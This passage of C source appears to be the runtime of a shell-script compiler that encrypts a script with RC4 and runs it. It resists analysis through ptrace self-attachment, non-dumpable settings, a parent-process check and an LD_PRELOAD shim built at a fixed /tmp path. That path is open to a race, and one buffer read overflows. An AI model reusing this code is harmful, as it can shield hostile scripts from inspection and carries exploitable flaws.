"        real___libc_start_main = dlsym(RTLD_NEXT, \"__libc_start_main\");",
"        if (!real___libc_start_main) abort();",
"    }",
"",
"    n = read(21, secret, sizeof(secret));",
"    if (n > 0) {",
"      int i;",
"",
"    if (secret[n - 1] == '\\n') secret[--n] = '\\0';",
"    for (i = 1; i < argc; i++)",
"        if (strcmp(argv[i], PLACEHOLDER) == 0)",
"          argv[i] = secret;",
"    }",
"",
"    real_main = main;",
"",
"    return real___libc_start_main(mymain, argc, argv, init, fini, rtld_fini, stack_end);",
"}",
"",
0};
#endif /* HARDENING */

/* rtc.c */

#include <sys/stat.h>
#include <sys/types.h>

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

/* 'Alleged RC4' */

static unsigned char stte[256], indx, jndx, kndx;

/*
 * Reset arc4 stte. 
 */
void stte_0(void)
{
	indx = jndx = kndx = 0;
	do {
		stte[indx] = indx;
	} while (++indx);
}

/*
 * Set key. Can be used more than once. 
 */
void key(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		do {
			tmp = stte[indx];
			kndx += tmp;
			kndx += ptr[(int)indx % len];
			stte[indx] = stte[kndx];
			stte[kndx] = tmp;
		} while (++indx);
		ptr += 256;
		len -= 256;
	}
}

/*
 * Crypt data. 
 */
void arc4(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		indx++;
		tmp = stte[indx];
		jndx += tmp;
		stte[indx] = stte[jndx];
		stte[jndx] = tmp;
		tmp += stte[indx];
		*ptr ^= stte[tmp];
		ptr++;
		len--;
	}
}

/* End of ARC4 */

#if HARDENING

#include <sys/ptrace.h>
#include <sys/wait.h>
#include <signal.h>
#include <sys/prctl.h>
#define PR_SET_PTRACER 0x59616d61

/* Seccomp Sandboxing Init */
#include <stdlib.h>
#include <stdio.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/socket.h>

#include <linux/filter.h>
#include <linux/seccomp.h>
#include <linux/audit.h>

#define ArchField offsetof(struct seccomp_data, arch)

#define Allow(syscall) \
    BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, SYS_##syscall, 0, 1), \
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW)

struct sock_filter filter[] = {
    /* validate arch */
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, ArchField),
    BPF_JUMP( BPF_JMP+BPF_JEQ+BPF_K, AUDIT_ARCH_X86_64, 1, 0),
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),

    /* load syscall */
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, offsetof(struct seccomp_data, nr)),

    /* list of allowed syscalls */
    Allow(exit_group),  /* exits a process */
    Allow(brk),         /* for malloc(), inside libc */
    Allow(mmap),        /* also for malloc() */
    Allow(munmap),      /* for free(), inside libc */

    /* and if we don't match above, die */
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),
};
struct sock_fprog filterprog = {
    .len = sizeof(filter)/sizeof(filter[0]),
    .filter = filter
};

/* Seccomp Sandboxing - Set up the restricted environment */
void seccomp_hardening() {
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
        perror("Could not start seccomp:");
        exit(1);
    }
    if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &filterprog) == -1) {
        perror("Could not start seccomp:");
        exit(1);
    }
} 
/* End Seccomp Sandboxing Init */

void shc_x_file() {
    FILE *fp;
    int line = 0;

    if ((fp = fopen("/tmp/shc_x.c", "w")) == NULL ) {exit(1); exit(1);}
    for (line = 0; shc_x[line]; line++)	fprintf(fp, "%s\n", shc_x[line]);
    fflush(fp);fclose(fp);
}

int make() {
	char * cc, * cflags, * ldflags;
    char cmd[4096];

	cc = getenv("CC");
	if (!cc) cc = "cc";

	sprintf(cmd, "%s %s -o %s %s", cc, "-Wall -fpic -shared", "/tmp/shc_x.so", "/tmp/shc_x.c -ldl");
	if (system(cmd)) {remove("/tmp/shc_x.c"); return -1;}
	remove("/tmp/shc_x.c"); return 0;
}

void arc4_hardrun(void * str, int len) {
    //Decode locally
    char tmp2[len];
    char tmp3[len+1024];
    memcpy(tmp2, str, len);

	unsigned char tmp, * ptr = (unsigned char *)tmp2;
    int lentmp = len;
    int pid, status;
    pid = fork();

    shc_x_file();
    if (make()) {exit(1);}

    setenv("LD_PRELOAD","/tmp/shc_x.so",1);

    if(pid==0) {

        //Start tracing to protect from dump & trace
        if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) {
            kill(getpid(), SIGKILL);
            _exit(1);
        }

        //Decode Bash
        while (len > 0) {
            indx++;
            tmp = stte[indx];
            jndx += tmp;
            stte[indx] = stte[jndx];
            stte[jndx] = tmp;
            tmp += stte[indx];
            *ptr ^= stte[tmp];
            ptr++;
            len--;
        }

        //Do the magic
        sprintf(tmp3, "%s %s", "'********' 21<<<", tmp2);

        //Exec bash script //fork execl with 'sh -c'
        system(tmp2);

        //Empty script variable
        memcpy(tmp2, str, lentmp);

        //Clean temp
        remove("/tmp/shc_x.so");

        //Sinal to detach ptrace
        ptrace(PTRACE_DETACH, 0, 0, 0);
        exit(0);
    }
    else {wait(&status);}

    /* Seccomp Sandboxing - Start */
    seccomp_hardening();

    exit(0);
}
#endif /* HARDENING */

/*
 * Key with file invariants. 
 */
int key_with_file(char * file)
{
	struct stat statf[1];
	struct stat control[1];

	if (stat(file, statf) < 0)
		return -1;

	/* Turn on stable fields */
	memset(control, 0, sizeof(control));
	control->st_ino = statf->st_ino;
	control->st_dev = statf->st_dev;
	control->st_rdev = statf->st_rdev;
	control->st_uid = statf->st_uid;
	control->st_gid = statf->st_gid;
	control->st_size = statf->st_size;
	control->st_mtime = statf->st_mtime;
	control->st_ctime = statf->st_ctime;
	key(control, sizeof(control));
	return 0;
}

#if DEBUGEXEC
void debugexec(char * sh11, int argc, char ** argv)
{
	int i;
	fprintf(stderr, "shll=%s\n", sh11 ? sh11 : "<null>");
	fprintf(stderr, "argc=%d\n", argc);
	if (!argv) {
		fprintf(stderr, "argv=<null>\n");
	} else { 
		for (i = 0; i <= argc ; i++)
			fprintf(stderr, "argv[%d]=%.60s\n", i, argv[i] ? argv[i] : "<null>");
	}
}
#endif /* DEBUGEXEC */

void rmarg(char ** argv, char * arg)
{
	for (; argv && *argv && *argv != arg; argv++);
	for (; argv && *argv; argv++)
		*argv = argv[1];
}

void chkenv_end(void);

int chkenv(int argc)
{
	char buff[512];
	unsigned long mask, m;
	int l, a, c;
	char * string;
	extern char ** environ;

	mask = (unsigned long)getpid();
	stte_0();
	 key(&chkenv, (void*)&chkenv_end - (void*)&chkenv);
	 key(&data, sizeof(data));
	 key(&mask, sizeof(mask));
	arc4(&mask, sizeof(mask));
	sprintf(buff, "x%lx", mask);
	string = getenv(buff);
#if DEBUGEXEC
	fprintf(stderr, "getenv(%s)=%s\n", buff, string ? string : "<null>");
#endif
	l = strlen(buff);
	if (!string) {
		/* 1st */
		sprintf(&buff[l], "=%lu %d", mask, argc);
		putenv(strdup(buff));
		return 0;
	}
	c = sscanf(string, "%lu %d%c", &m, &a, buff);
	if (c == 2 && m == mask) {
		/* 3rd */
		rmarg(environ, &string[-l - 1]);
		return 1 + (argc - a);
	}
	return -1;
}

void chkenv_end(void){}

#if HARDENING

static void gets_process_name(const pid_t pid, char * name) {
	char procfile[BUFSIZ];
	sprintf(procfile, "/proc/%d/cmdline", pid);
	FILE* f = fopen(procfile, "r");
	if (f) {
		size_t size;
		size = fread(name, sizeof (char), sizeof (procfile), f);
		if (size > 0) {
			if ('\n' == name[size - 1])
				name[size - 1] = '\0';
		}
		fclose(f);
	}
}

void hardening() {
    prctl(PR_SET_DUMPABLE, 0);
    prctl(PR_SET_PTRACER, -1);

    int pid = getppid();
    char name[256] = {0};
    gets_process_name(pid, name);

    if (   (strcmp(name, "bash") != 0) 
        && (strcmp(name, "/bin/bash") != 0) 
        && (strcmp(name, "sh") != 0) 
        && (strcmp(name, "/bin/sh") != 0) 
        && (strcmp(name, "sudo") != 0) 
        && (strcmp(name, "/bin/sudo") != 0) 
        && (strcmp(name, "/usr/bin/sudo") != 0)
        && (strcmp(name, "gksudo") != 0) 
        && (strcmp(name, "/bin/gksudo") != 0) 
        && (strcmp(name, "/usr/bin/gksudo") != 0) 
        && (strcmp(name, "kdesu") != 0) 
        && (strcmp(name, "/bin/kdesu") != 0) 
        && (strcmp(name, "/usr/bin/kdesu") != 0) 
       )
    {
        printf("Operation not permitted\n");
        kill(getpid(), SIGKILL);
        exit(1);
    }
}

#endif /* HARDENING */

#if !TRACEABLE

#define _LINUX_SOURCE_COMPAT
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>

#if !defined(PT_ATTACHEXC) /* New replacement for PT_ATTACH */
   #if !defined(PTRACE_ATTACH) && defined(PT_ATTACH)
       #define PT_ATTACHEXC	PT_ATTACH
   #elif defined(PTRACE_ATTACH)
       #define PT_ATTACHEXC PTRACE_ATTACH
   #endif
#endif

void untraceable(char * argv0)
{
	char proc[80];
	int pid, mine;

	switch(pid = fork()) {
	case  0:
		pid = getppid();
		/* For problematic SunOS ptrace */
#if defined(__FreeBSD__)
		sprintf(proc, "/proc/%d/mem", (int)pid);
#else
		sprintf(proc, "/proc/%d/as",  (int)pid);
#endif
		close(0);
		mine = !open(proc, O_RDWR|O_EXCL);
		if (!mine && errno != EBUSY)
			mine = !ptrace(PT_ATTACHEXC, pid, 0, 0);
		if (mine) {
			kill(pid, SIGCONT);
		} else {
			perror(argv0);
			kill(pid, SIGKILL);
		}
		_exit(mine);
	case -1:
		break;
	default:
		if (pid == waitpid(pid, 0, 0))
			return;
	}
	perror(argv0);
	_exit(1);
}
#endif /* !TRACEABLE */

char * xsh(int argc, char ** argv)
{
	char * scrpt;
	int ret, i, j;
	char ** varg;
	char * me = argv[0];
	if (me == NULL) { me = getenv("_"); }
	if (me == 0) { fprintf(stderr, "E: neither argv[0] nor $_ works."); exit(1); }

	ret = chkenv(argc);
	stte_0();
	 key(pswd, pswd_z);
	arc4(msg1, msg1_z);
	arc4(date, date_z);
	if (date[0] && (atoll(date)<time(NULL)))
		return msg1;
	arc4(shll, shll_z);
	arc4(inlo, inlo_z);
	arc4(xecc, xecc_z);
	arc4(lsto, lsto_z);
	arc4(tst1, tst1_z);
	 key(tst1, tst1_z);
	arc4(chk1, chk1_z);
	if ((chk1_z != tst1_z) || memcmp(tst1, chk1, tst1_z))
		return tst1;
	arc4(msg2, msg2_z);
	if (ret < 0)
		return msg2;
	varg = (char **)calloc(argc + 10, sizeof(char *));
	if (!varg)
		return 0;
	if (ret) {
		arc4(rlax, rlax_z);
		if (!rlax[0] && key_with_file(shll))
			return shll;
		arc4(opts, opts_z);
#if HARDENING
	    arc4_hardrun(text, text_z);
	    exit(0);
       /* Seccomp Sandboxing - Start */
       seccomp_hardening();
#endif
		arc4(text, text_z);
		arc4(tst2, tst2_z);
		 key(tst2, tst2_z);
		arc4(chk2, chk2_z);
		if ((chk2_z != tst2_z) || memcmp(tst2, chk2, tst2_z))
			return tst2;
		/* Prepend hide_z spaces to script text to hide it. */
		scrpt = malloc(hide_z + text_z);
		if (!scrpt)
			return 0;
		memset(scrpt, (int) ' ', hide_z);
		memcpy(&scrpt[hide_z], text, text_z);
	} else {			/* Reexecute */
		if (*xecc) {
			scrpt = malloc(512);
			if (!scrpt)
				return 0;
			sprintf(scrpt, xecc, me);
		} else {
			scrpt = me;
		}
	}
	j = 0;
#if BUSYBOXON
	varg[j++] = "busybox";
	varg[j++] = "sh";
#else
	varg[j++] = argv[0];		/* My own name at execution */
#endif
	if (ret && *opts)
		varg[j++] = opts;	/* Options on 1st line of code */
	if (*inlo)
		varg[j++] = inlo;	/* Option introducing inline code */
	varg[j++] = scrpt;		/* The script itself */
	if (*lsto)
		varg[j++] = lsto;	/* Option meaning last option */
	i = (ret > 1) ? ret : 0;	/* Args numbering correction */
	while (i < argc)
		varg[j++] = argv[i++];	/* Main run-time arguments */
	varg[j] = 0;			/* NULL terminated array */
#if DEBUGEXEC
	debugexec(shll, j, varg);
#endif
	execvp(shll, varg);
	return shll;
}

int main(int argc, char ** argv)
{
#if SETUID
   setuid(0);
#endif
#if DEBUGEXEC
	debugexec("main", argc, argv);
#endif
#if HARDENING
	hardening();
#endif
#if !TRACEABLE
	untraceable(argv[0]);
#endif
	argv[1] = xsh(argc, argv);
	fprintf(stderr, "%s%s%s: %s\n", argv[0],
		errno ? ": " : "",
		errno ? strerror(errno) : "",
		argv[1] ? argv[1] : "<null>"
	);
	return 1;
}
